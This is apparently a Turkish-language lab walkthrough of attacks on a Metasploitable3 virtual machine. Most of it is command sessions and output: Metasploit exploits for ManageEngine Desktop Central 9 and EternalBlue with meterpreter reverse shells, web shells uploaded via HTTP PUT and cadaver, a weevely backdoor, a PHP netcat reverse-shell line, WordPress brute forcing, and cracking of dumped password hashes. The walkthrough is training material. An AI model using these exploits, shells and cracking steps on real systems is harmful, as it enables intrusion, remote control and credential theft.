ManageEngine Desktop Central 9

root@kali:~# nmap 192.168.119.108 -sV -A -v


Tarama sonuçlarında Metasploitable3 makinesinde 8020 ve 8383 portlarınn Apache Httpd üzerinde çalıştığını görüyoruz.

Öyleyse hemen bu portları da kullanarak browser üzerinden erişebileceğimiz birşey var mı bakalım. (Neydi Enumeration is the key )

https://192.168.119.108:8383

O da nesi. ManageEngine Desktop Central Login arayüzüne erişim sağladık. Sayfanın bize sağladığı bilgilerden yola çıkarak elde edebileceklerimizi araştırmaya başlayalım.


msf5 > search manageengine

Yukarıdaki komutu çalıştırdığımızda Manage Engine Desktop Central 9 için yayımlanmış bir exploit olduğunu görüyoruz. (Burada arama sonucunda birşey elde edemeseydik tespit edilen bir zafiyet olup olmadığını google’a soracaktık.)

24 exploit/windows/http/manageengine_connectionid_write 2015-12-14 excellent Yes ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability

msf5 > use exploit/windows/http/manageengine_connectionid_write

msf5 exploit(windows/http/manageengine_connectionid_write) > show options

Module options (exploit/windows/http/manageengine_connectionid_write):

Name Current Setting Required Description

—- ————— ——– ———–

Proxies no A proxy chain of format type:host:port[,type:host:port][…]

RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’

RPORT 8020 yes The target port (TCP)

SSL false no Negotiate SSL/TLS for outgoing connections

TARGETURI / yes The base path for ManageEngine Desktop Central

VHOST no HTTP server virtual host

Exploit target:

Id Name

— —-

0 ManageEngine Desktop Central 9 on Windows

msf5 exploit(windows/http/manageengine_connectionid_write) > set RHOSTS 192.168.119.108

RHOSTS => 192.168.119.108

msf5 exploit(windows/http/manageengine_connectionid_write) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf5 exploit(windows/http/manageengine_connectionid_write) > set lhost 192.168.119.107

lhost => 192.168.119.107

msf5 exploit(windows/http/manageengine_connectionid_write) > show options

Module options (exploit/windows/http/manageengine_connectionid_write):

Name Current Setting Required Description

—- ————— ——– ———–

Proxies no A proxy chain of format type:host:port[,type:host:port][…]

RHOSTS 192.168.119.108 yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’

RPORT 8020 yes The target port (TCP)

SSL false no Negotiate SSL/TLS for outgoing connections

TARGETURI / yes The base path for ManageEngine Desktop Central

VHOST no HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

—- ————— ——– ———–

EXITFUNC process yes Exit technique (Accepted: ”, seh, thread, process, none)

LHOST 192.168.119.107 yes The listen address (an interface may be specified)

LPORT 4444 yes The listen port

Exploit target:

Id Name

— —-

0 ManageEngine Desktop Central 9 on Windows

msf5 exploit(windows/http/manageengine_connectionid_write) >



msf5 exploit(windows/http/manageengine_connectionid_write) > exploit

[*] Started reverse TCP handler on 192.168.119.107:4444

[*] Creating JSP stager

[*] Uploading JSP stager DmMoU.jsp…

[*] Executing stager…

[*] Sending stage (180291 bytes) to 192.168.119.108

[*] Meterpreter session 1 opened (192.168.119.107:4444 -> 192.168.119.108:49340) at 2019-11-11 14:52:41 -0500

[!] This exploit may require manual cleanup of ‘../webapps/DesktopCentral/jspf/DmMoU.jsp’ on the target

meterpreter >

[+] Deleted ../webapps/DesktopCentral/jspf/DmMoU.jsp

whoami

[-] Unknown command: whoami.

meterpreter > getuid

Server username: NT AUTHORITY\LOCAL SERVICE

meterpreter > sysinfo

Computer : METASPLOITABLE3

OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).

Architecture : x64

System Language : en_US

Domain : WORKGROUP

Logged On Users : 1

Meterpreter : x86/windows

meterpreter >


SMB – EternalBlue Zafiyeti Metasploit Console Üzerinden Ele Geçirme

msf5 > search eternalblue

Matching Modules

================

# Name Disclosure Date Rank Check Description

– —- ————— —- —– ———–

0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution

1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection

2 exploit/windows/smb/doublepulsar_rce 2017-04-14 great Yes DOUBLEPULSAR Payload Execution and Neutralization

3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+

5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

msf5 > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description

—- ————— ——– ———–

RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’

RPORT 445 yes The target port (TCP)

SMBDomain . no (Optional) The Windows domain to use for authentication

SMBPass no (Optional) The password for the specified username

SMBUser no (Optional) The username to authenticate as

VERIFY_ARCH true yes Check if remote architecture matches exploit Target.

VERIFY_TARGET true yes Check if remote OS matches exploit Target.

Exploit target:

Id Name

— —-

0 Windows 7 and Server 2008 R2 (x64) All Service Packs

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.119.108

RHOSTS => 192.168.119.108

msf5 exploit(windows/smb/ms17_010_eternalblue) >

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.119.107

lhost => 192.168.119.107

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

Eternal Blue zafiyetini sömürmek istediğimizde en can sıkıcı durumlardan bir tanesi kurban makinesinin mavi ekran vermesidir. Bu durumda birkaç deneme yapmamız gerekebiliyor.

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.119.107:4444

[+] 192.168.119.108:445 – Host is likely VULNERABLE to MS17-010! – Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)

[*] 192.168.119.108:445 – Connecting to target for exploitation.

[+] 192.168.119.108:445 – Connection established for exploitation.

[+] 192.168.119.108:445 – Target OS selected valid for OS indicated by SMB reply

[*] 192.168.119.108:445 – CORE raw buffer dump (51 bytes)

[*] 192.168.119.108:445 – 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2

[*] 192.168.119.108:445 – 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard

[*] 192.168.119.108:445 – 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac

[*] 192.168.119.108:445 – 0x00000030 6b 20 31 k 1

[+] 192.168.119.108:445 – Target arch selected valid for arch indicated by DCE/RPC reply

[*] 192.168.119.108:445 – Trying exploit with 12 Groom Allocations.

[*] 192.168.119.108:445 – Sending all but last fragment of exploit packet

[*] 192.168.119.108:445 – Starting non-paged pool grooming

[+] 192.168.119.108:445 – Sending SMBv2 buffers

[+] 192.168.119.108:445 – Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] 192.168.119.108:445 – Sending final SMBv2 buffers.

[*] 192.168.119.108:445 – Sending last fragment of exploit packet!

[*] 192.168.119.108:445 – Receiving response from exploit packet

[+] 192.168.119.108:445 – ETERNALBLUE overwrite completed successfully (0xC000000D)!

[*] 192.168.119.108:445 – Sending egg to corrupted connection.

[*] 192.168.119.108:445 – Triggering free of corrupted buffer.

[*] Sending stage (206403 bytes) to 192.168.119.108

[*] Meterpreter session 2 opened (192.168.119.107:4444 -> 192.168.119.108:49292) at 2019-11-11 15:10:05 -0500

[+] 192.168.119.108:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[+] 192.168.119.108:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[+] 192.168.119.108:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > sysinfo

Computer : METASPLOITABLE3

OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).

Architecture : x64

System Language : en_US

Domain : WORKGROUP

Logged On Users : 1

Meterpreter : x64/windows

meterpreter > dir

Listing: C:\Windows\system32

============================

EternalBlue Manuel Metodlar

root@kali:~/eternalblue# git clone https://github.com/interference-security/Eternalblue-Doublepulsar.git

Cloning into ‘Eternalblue-Doublepulsar’…

remote: Enumerating objects: 67, done.

remote: Total 67 (delta 0), reused 0 (delta 0), pack-reused 67

Unpacking objects: 100% (67/67), done.

root@kali:~/eternalblue# cd Eternalblue-Doublepulsar/

root@kali:~/eternalblue/Eternalblue-Doublepulsar# ls -l

total 48

drwxr-xr-x 2 root root 4096 Nov 14 07:48 deps

-rwxr-xr-x 1 root root 5222 Nov 14 07:48 eternalblue_doublepulsar.rb

-rw-r–r– 1 root root 1965 Nov 14 07:48 eternalblue-exploit.sh

-rw-r–r– 1 root root 26461 Nov 14 07:48 LICENSE

-rw-r–r– 1 root root 900 Nov 14 07:48 README.md

root@kali:~/eternalblue/Eternalblue-Doublepulsar# chmod +x eternalblue-exploit.sh

root@kali:~/eternalblue/Eternalblue-Doublepulsar# ./eternalblue-exploit.sh 192.168.119.108 445 60 WIN72K8R2 x64 lsass.exe adfw.dll

[*] Started: Thu 14 Nov 2019 08:23:49 AM EST

[*] Creating EternalBlue XML template

[*] Setting values in EternalBlue XML file

[*] Creating DoublePulsar XML template

[*] Setting values in DoublePulsar XML file

[*] Executing EternalBlue

[*] Connecting to target for exploitation.

[+] Connection established for exploitation.

[*] Pinging backdoor…

[+] Backdoor not installed, game on.

[*] Target OS selected valid for OS indicated by SMB reply

[*] CORE raw buffer dump (52 bytes):

0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2

0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard

0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac

0x00000030 6b 20 31 00 k 1.

[*] Building exploit buffer

[*] Sending all but last fragment of exploit packet

…………….DONE.

[*] Sending SMB Echo request

[*] Good reply from SMB Echo request

[*] Starting non-paged pool grooming

[+] Sending SMBv2 buffers

………….DONE.

[+] Sending large SMBv1 buffer..DONE.

[+] Sending final SMBv2 buffers……DONE.

[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] Sending SMB Echo request

[*] Good reply from SMB Echo request

[*] Sending last fragment of exploit packet!

DONE.

[*] Receiving response from exploit packet

[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!

[*] Sending egg to corrupted connection.

[*] Triggering free of corrupted buffer.

[*] Pinging backdoor…

[+] Backdoor returned code: 10 – Success!

[+] Ping returned Target architecture: x64 (64-bit)

[+] Backdoor installed

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[*] CORE sent serialized output blob (2 bytes):

0x00000000 08 00 ..

[*] Received output parameters from CORE

[+] CORE terminated with status code 0x00000000

HTTP Put Metodu

root@kali:~# nmap -script http-methods -script-args http-methods.url-path=’/uploads’,http-methods.test-all -p 8585 192.168.119.108

Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-11 15:11 EST

Nmap scan report for 192.168.119.108

Host is up (0.00031s latency).

PORT STATE SERVICE

8585/tcp open unknown

MAC Address: 08:00:27:36:17:67 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 14.30 seconds

root@kali:~# Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-09 07:02 EST

Nikto

root@kali:~# nikto -host http://192.168.119.108:8585/uploads

– Nikto v2.1.6

—————————————————————————

+ Target IP: 192.168.119.108

+ Target Hostname: 192.168.119.108

+ Target Port: 8585

+ Start Time: 2019-11-11 15:13:13 (GMT-5)

—————————————————————————

+ Server: Apache/2.2.21 (Win64) PHP/5.3.10 DAV/2

+ The anti-clickjacking X-Frame-Options header is not present.

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

+ OSVDB-3268: /uploads/: Directory indexing found.

+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)

+ PHP/5.3.10 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.

+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.

+ Server may leak inodes via ETags, header found with file /uploads/nikto-test-o7fmDVla.html, inode: W/1000000000b37a, size: 16, mtime: 59717c30c7ddd

+ OSVDB-397: HTTP method ‘PUT’ allows clients to save files on the web server.

+ Retrieved dav header: 1,2

+ Retrieved ms-author-via header: DAV

+ Uncommon header ‘ms-author-via’ found, with contents: DAV

+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST, DELETE, TRACE, PROPFIND, PROPPATCH, COPY, MOVE, LOCK, UNLOCK

+ OSVDB-5646: HTTP method (‘Allow’ Header): ‘DELETE’ may allow clients to remove files on the web server.

+ OSVDB-5647: HTTP method (‘Allow’ Header): ‘MOVE’ may allow clients to change file locations on the web server.

+ WebDAV enabled (PROPPATCH COPY PROPFIND LOCK UNLOCK listed as allowed)

+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST

+ OSVDB-3268: /uploads/./: Directory indexing found.

+ /uploads/./: Appending ‘/./’ to a directory allows indexing

+ OSVDB-3268: /uploads//: Directory indexing found.

+ /uploads//: Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.

+ OSVDB-3268: /uploads/%2e/: Directory indexing found.

+ OSVDB-576: /uploads/%2e/: Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. http://www.securityfocus.com/bid/2513.

OSVDB-3268: /uploads///: Directory indexing found.

+ OSVDB-119: /uploads/?PageServices: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via ‘open directory browsing’. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.

+ OSVDB-119: /uploads/?wp-cs-dump: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via ‘open directory browsing’. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.

+ OSVDB-3268: /uploads///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Directory indexing found.

+ OSVDB-3288: /uploads///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Abyss 1.03 reveals directory listing when      /’s are requested.

Nmap HTTP PUT Meterpreter shell

root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.119.107 lport=4444 -f raw > /root/ce-shell.php

[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload

[-] No arch selected, selecting arch: php from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 1116 bytes

root@kali:~#

root@kali:~# vim ce-shell.php

PHP dosyasının en başındaki /* kısmını siliyoruz.

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

payload => php/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lport 4444

lport => 4444

msf5 exploit(multi/handler) > set lhost 192.168.119.107

lhost => 192.168.119.107

msf5 exploit(multi/handler) >

oot@kali:~# nmap -sV -script http-put -script-args http-put.url=’/uploads/ce-shell.php’,http-put.file=’/root/ce-shell.php’ -p 8585 192.168.119.108

Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-11 15:19 EST

Nmap scan report for 192.168.119.108

Host is up (0.00032s latency).

PORT STATE SERVICE VERSION

8585/tcp open http Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2)

|_http-put: ERROR: Failed to open file: \xE2\x80\x99/root/ce-shell.php\xE2\x80\x99

|_http-server-header: Apache/2.2.21 (Win64) PHP/5.3.10 DAV/2

MAC Address: 08:00:27:36:17:67 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 25.75 seconds

root@kali:~# root@kali:~#

msf5 > use auxiliary/scanner/http/http_put

msf5 auxiliary(scanner/http/http_put) > set rhosts 192.168.119.108

rhosts => 192.168.119.108

msf5 auxiliary(scanner/http/http_put) > set path /uploads

path => /uploads

msf5 auxiliary(scanner/http/http_put) > set filename ce-shell.php

filename => ce-shell.php

msf5 auxiliary(scanner/http/http_put) > set filedata file://root/ce-shell.php

msf5 auxiliary(scanner/http/http_put) > set rport 8585

rport => 8585

msf5 auxiliary(scanner/http/http_put) > exploit

http://192.168.119.108:8585/uploads/ce-shell.php

Boooom.

Metasploitable 3 WordPress Sitesini Ele Geçirme

root@kali:~# wpscan –url http://192.168.119.108:8585/wordpress/

______________________________________________________________

__ _______ _____

\ \ / / __ \ / ____|

\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®

\ \/ \/ / | ___/ \___ \ / __|/ _` | ‘_ \

\ /\ / | | ____) | (__| (_| | | | |

\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team

Version 3.7.3

WPScan.io – Online WordPress Vulnerability Scanner

@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_

_______________________________________________________________

[i] It seems like you have not updated the database for some time.

[?] Do you want to update now? [Y]es [N]o, default: [N][+] URL: http://192.168.119.108:8585/wordpress/

[+] Started: Mon Nov 11 15:33:02 2019

Interesting Finding(s):

[+] http://192.168.119.108:8585/wordpress/

| Interesting Entries:

| – Server: Apache/2.2.21 (Win64) PHP/5.3.10 DAV/2

| – X-Powered-By: PHP/5.3.10

| Found By: Headers (Passive Detection)

| Confidence: 100%

[+] http://192.168.119.108:8585/wordpress/xmlrpc.php

| Found By: Link Tag (Passive Detection)

| Confidence: 100%

| Confirmed By: Direct Access (Aggressive Detection), 100% confidence

| References:

| – http://codex.wordpress.org/XML-RPC_Pingback_API

| – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner

| – https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos

| – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login

| – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.119.108:8585/wordpress/readme.html

| Found By: Direct Access (Aggressive Detection)

| Confidence: 100%

[+] http://192.168.119.108:8585/wordpress/wp-includes/rss-functions.php

| Interesting Entry: C:\wamp\www\wordpress\wp-includes\rss-functions.php

| Found By: Direct Access (Aggressive Detection)

| Confidence: 100%

| Reference: https://www.owasp.org/index.php/Full_Path_Disclosure

[+] Upload directory has listing enabled: http://192.168.119.108:8585/wordpress/wp-content/uploads/

| Found By: Direct Access (Aggressive Detection)

| Confidence: 100%

[+] http://192.168.119.108:8585/wordpress/wp-cron.php

| Found By: Direct Access (Aggressive Detection)

| Confidence: 60%

| References:

| – https://www.iplocation.net/defend-wordpress-from-ddos

| – https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.6.1 identified (Insecure, released on 2016-09-07).

| Detected By: Rss Generator (Passive Detection)

| – http://192.168.119.108:8585/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=4.6.1</generator>

| – http://192.168.119.108:8585/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.6.1</generator>

[+] WordPress theme in use: twentyfourteen

| Location: http://192.168.119.108:8585/wordpress/wp-content/themes/twentyfourteen/

| Last Updated: 2019-05-07T00:00:00.000Z

| Readme: http://192.168.119.108:8585/wordpress/wp-content/themes/twentyfourteen/readme.txt

| [!] The version is out of date, the latest version is 2.7

| Style URL: http://192.168.119.108:8585/wordpress/wp-content/themes/twentyfourteen/style.css?ver=4.6.1

| Style Name: Twenty Fourteen

| Style URI: https://wordpress.org/themes/twentyfourteen/

| Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design…

| Author: the WordPress team

| Author URI: https://wordpress.org/

|

| Detected By: Css Style (Passive Detection)

|

| Version: 1.8 (80% confidence)

| Detected By: Style (Passive Detection)

| – http://192.168.119.108:8585/wordpress/wp-content/themes/twentyfourteen/style.css?ver=4.6.1, Match: ‘Version: 1.8’

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)

Checking Config Backups – Time: 00:00:00 <======================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.

[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up.

[+] Finished: Mon Nov 11 15:33:25 2019

[+] Requests Done: 49

[+] Cached Requests: 5

[+] Data Sent: 16.31 KB

[+] Data Received: 200.305 KB

[+] Memory used: 182.352 MB

[+] Elapsed time: 00:00:23

root@kali:~#

msf5 auxiliary> use auxiliary/scanner/http/wordpress_login_enum

msf5 auxiliary(scanner/http/wordpress_login_enum) > show options

Module options (auxiliary/scanner/http/wordpress_login_enum):

Name Current Setting Required Description

—- ————— ——– ———–

BLANK_PASSWORDS false no Try blank passwords for all users

BRUTEFORCE true yes Perform brute force authentication

BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5

DB_ALL_CREDS false no Try each user/password couple stored in the current database

DB_ALL_PASS false no Add all passwords in the current database to the list

DB_ALL_USERS false no Add all users in the current database to the list

ENUMERATE_USERNAMES true yes Enumerate usernames

PASSWORD no A specific password to authenticate with

PASS_FILE no File containing passwords, one per line

Proxies no A proxy chain of format type:host:port[,type:host:port][…]

RANGE_END 10 no Last user id to enumerate

RANGE_START 1 no First user id to enumerate

RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’

RPORT 80 yes The target port (TCP)

SSL false no Negotiate SSL/TLS for outgoing connections

STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host

TARGETURI / yes The base path to the wordpress application

THREADS 1 yes The number of concurrent threads

USERNAME no A specific username to authenticate as

USERPASS_FILE no File containing users and passwords separated by space, one pair per line

USER_AS_PASS false no Try the username as the password for all users

USER_FILE no File containing usernames, one per line

VALIDATE_USERS true yes Validate usernames

VERBOSE true yes Whether to print output for all attempts

VHOST no HTTP server virtual host

msf5 auxiliary(scanner/http/wordpress_login_enum) > set bruteforce_speed 100

bruteforce_speed => 100

msf5 auxiliary(scanner/http/wordpress_login_enum) > set pass_file /root/parola.txt

pass_file => /root/parola.txt

msf5 auxiliary(scanner/http/wordpress_login_enum) > set user_file /root/users.txt

user_file => /root/users.txt

msf5 auxiliary(scanner/http/wordpress_login_enum) > set RHOSTS 192.168.119.108

RHOSTS => 192.168.119.108

msf5 auxiliary(scanner/http/wordpress_login_enum) > set rport 8585

rport => 8585

msf5 auxiliary(scanner/http/wordpress_login_enum) > set targeturi /wordpress

targeturi => /wordpress/

msf5 auxiliary(scanner/http/wordpress_login_enum) > run

Brute Force başlasın. Güç bizimle olsun

Ve login olabileceğimiz bir kullanıcı bilgisi elde ettik gibi görünüyor.

Boooom,içerdeyiz.

<?php echo shell_exec(“nc.exe 192.168.119.107 4444 -e cmd.exe”); ?>

root@kali:~# nc -nvlp 4444

listening on [any] 4444 …

connect to [192.168.119.107] from (UNKNOWN) [192.168.119.108] 49551

Microsoft Windows [Version 6.1.7601]

Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\wamp\www\wordpress>dir

dir

Volume in drive C is Windows 2008R2

Volume Serial Number is B421-16B4

Directory of C:\wamp\www\wordpress

09/26/2016 02:28 PM 255 .htaccess

09/24/2013 04:18 PM 418 index.php

03/05/2016 12:14 PM 19,935 license.txt

07/26/2018 04:55 AM 59,392 nc.exe

08/16/2016 12:39 PM 7,344 readme.html

05/24/2016 01:02 PM 5,456 wp-activate.php

09/07/2016 06:58 AM <DIR> wp-admin

12/19/2015 03:20 AM 364 wp-blog-header.php

05/23/2016 08:44 AM 1,477 wp-comments-post.php

12/16/2015 01:58 AM 2,853 wp-config-sample.php

09/26/2016 02:27 PM 3,118 wp-config.php

11/11/2019 01:27 PM <DIR> wp-content

05/24/2015 09:26 AM 3,286 wp-cron.php

09/07/2016 06:58 AM <DIR> wp-includes

05/23/2016 08:44 AM 2,382 wp-links-opml.php

04/14/2016 09:53 AM 3,353 wp-load.php

06/14/2016 01:51 PM 34,057 wp-login.php

07/13/2016 04:37 AM 7,786 wp-mail.php

08/13/2016 08:02 AM 13,920 wp-settings.php

05/24/2016 12:44 PM 29,890 wp-signup.php

11/30/2014 01:23 PM 4,035 wp-trackback.php

07/06/2016 04:40 AM 3,064 xmlrpc.php

19 File(s) 202,385 bytes

3 Dir(s) 47,074,127,872 bytes free

C:\wamp\www\wordpress>cd c:\

cd c:\

c:\>dir

dir

Volume in drive C is Windows 2008R2

Volume Serial Number is B421-16B4

Directory of c:\

07/16/2018 12:27 PM <DIR> glassfish

07/16/2018 12:45 PM 0 jack_of_diamonds.png

07/16/2018 12:43 PM 103 java0.log

07/16/2018 12:43 PM 103 java1.log

07/16/2018 12:43 PM 103 java2.log

07/16/2018 12:42 PM <DIR> ManageEngine

07/16/2018 12:30 PM <DIR> openjdk6

07/13/2009 07:20 PM <DIR> PerfLogs

07/16/2018 12:44 PM <DIR> Program Files

07/16/2018 12:42 PM <DIR> Program Files (x86)

07/16/2018 12:31 PM <DIR> RubyDevKit

07/25/2018 04:25 AM <DIR> tmp

07/16/2018 12:30 PM <DIR> tools

07/17/2018 01:03 PM <DIR> Users

07/16/2018 02:11 PM <SYMLINKD> vagrant [\\vboxsvr\vagrant]

07/17/2018 11:02 AM <DIR> wamp

11/11/2019 11:59 AM <DIR> Windows

10/07/2015 05:22 PM 226 __Argon__.tmp

5 File(s) 535 bytes

13 Dir(s) 47,074,127,872 bytes free

c:\>

Cadaver ile Put metodunu Kullanarak Zafiyet Sömürme

root@kali:~# nano ce_shell.php

root@kali:~# cadaver http://192.168.119.108:8585/uploads/

dav:/uploads/> put ce_shell.php

Uploading ce_shell.php to `/uploads/ce_shell.php’:

Progress: [=============================>] 100.0% of 1115 bytes succeeded.

dav:/uploads/>

http://192.168.119.108:8585/uploads/

root@kali:~# curl http://192.168.119.108:8585/uploads/ce_shell.php?e=ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :

Link-local IPv6 Address . . . . . : fe80::f430:5058:4e6f:2a95%11

IPv4 Address. . . . . . . . . . . : 192.168.119.108

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . :

Tunnel adapter isatap.{F770E00C-2DAF-4DA9-8098-4AF2DFB8E7A5}:

Media State . . . . . . . . . . . : Media disconnected

Connection-specific DNS Suffix . :

root@kali:~#

root@kali:~# weevely generate basitparola /root/Desktop/vebasit.php

Generated ‘/root/Desktop/vebasit.php’ with password ‘basitparola’ of 779 byte size.

root@kali:~#

root@kali:~# weevely http://192.168.119.108:8585/uploads/vebasit.php basitparola

[+] weevely 3.7.0

[+] Target:    192.168.119.108:8585

[+] Session:    /root/.weevely/sessions/192.168.119.108/vebasit_0.session

[+] Browse the filesystem or execute commands starts the connection

[+] to the target. Type :help for more information.

weevely>

Metasploitable 3 Mysql Zafiyeti

root@kali:~# mysql -u root -h 192.168.119.108

Welcome to the MariaDB monitor. Commands end with ; or \g.

Your MySQL connection id is 216

Server version: 5.5.20-log MySQL Community Server (GPL)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

MySQL [(none)]> show databases;

+——————–+

| Database |

+——————–+

| information_schema |

| cards |

| mysql |

| performance_schema |

| test |

| wordpress |

+——————–+

6 rows in set (0.005 sec)

MySQL [(none)]> use wordpress;

Reading table information for completion of table and column names

You can turn off this feature to get a quicker startup with -A

Database changed

MySQL [wordpress]> select user_login, user_pass from wp_users;

+————+————————————+

| user_login | user_pass |

+————+————————————+

| admin | $P$B2PFjjNJHOQwDzqrQxfX4GYzasKQoN0 |

| vagrant | $P$BMO//62Hj1IFeIr0XuJUqMmtBllnzN/ |

| user | $P$B83ijKvzkiB6yZL8Ubpi35CMQHiQjv/ |

| manager | $P$BvcrF0Y02JqJRkbXMREj/CBvP..21s1 |

+————+————————————+

4 rows in set (0.001 sec)

MySQL [wordpress]>

root@kali:~# nano wordpresshash.txt

root@kali:~# john wordpresshash.txt –show

admin:sploit

1 password hashes cracked, 0 left